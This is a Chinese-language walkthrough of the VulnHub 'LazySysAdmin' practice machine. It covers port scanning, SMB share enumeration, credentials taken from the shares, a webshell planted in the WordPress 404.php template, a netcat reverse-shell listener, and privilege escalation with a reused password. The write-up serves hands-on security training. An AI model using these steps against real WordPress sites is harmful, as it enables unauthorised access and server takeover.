VulnHub lazysysadmin

一、信息收集

1.nmap扫描开发端口

开放了：22、80、445

访问80端口，没有发现什么有价值的信息

2.扫描共享文件


enum4linux--扫描共享文件
使用：
enum4linux 192.168.103.182
 
windows访问共享文件
\\192.168.103.182\文件夹名称

信息收集：

发现了一个密码，先收集一下

发现了一个数据库的账号密码


user:Admin
password:TogieMYSQL12345^^

3.扫目录

利用dirb

发现有phpmyadmin/和wordpress/目录

登录phpmyadmin/

登录进去后，发现查询不了数据库内容


user:Admin
password:TogieMYSQL12345^^

访问wordpress/目录

一直提示用户:togle

二、漏洞利用

1.wordpress 获取主机权限


1.wordpress登录地址：
http://192.168.103.182/wordpress/wp-admin
 
2.修改404页面，写入webshell
appearance--editor--404.php
 
3.访问404页面，反向连接（前提是先在控制端开启监听）
http://192.168.103.182/wordpress/wp-content/themes/twentyfifteen/404.php

登录wordpress地址


user:Admin
password:TogieMYSQL12345^^

修改404页面，写入webshell

ip是监听机的IP地址（kali）

访问404页面，反向连接（前提是先在控制端开启监听）


┌──(root💀kali)-[~]
└─# nc -lvvp 4444               
listening on [any] 4444 ...
 
然后再访问404.php
http://192.168.103.182/wordpress/wp-content/themes/twentyfifteen/404.php
 
python3 -c 'import pty; pty.spawn("/bin/bash")'  #python交互式shell

三、提权

密码是最开始找到的一个密码，12345


www-data@LazySysAdmin:/home$ su togie
su togie
Password: 12345

相关阅读:
Spring boot发布到k8s并加载Configmap配置文件,实现配置热更新
第14届蓝桥杯青少组python试题解析：23年5月省赛
深度神经网络训练
上周热点回顾（3.21-3.27）
学习 C++ 到底有什么好处？
最优控制理论（一）基本概念
元器件贸易企业如何借助ERP系统，解决订单管理难题？
亚远景科技-ASPICE评估输入
windows下用Java跑通spark官方文档的quick-start
JVM诊断及工具笔记(4) 使用visualvm分析JVM堆内存泄漏

原文地址：https://blog.csdn.net/SENMINGya/article/details/133863312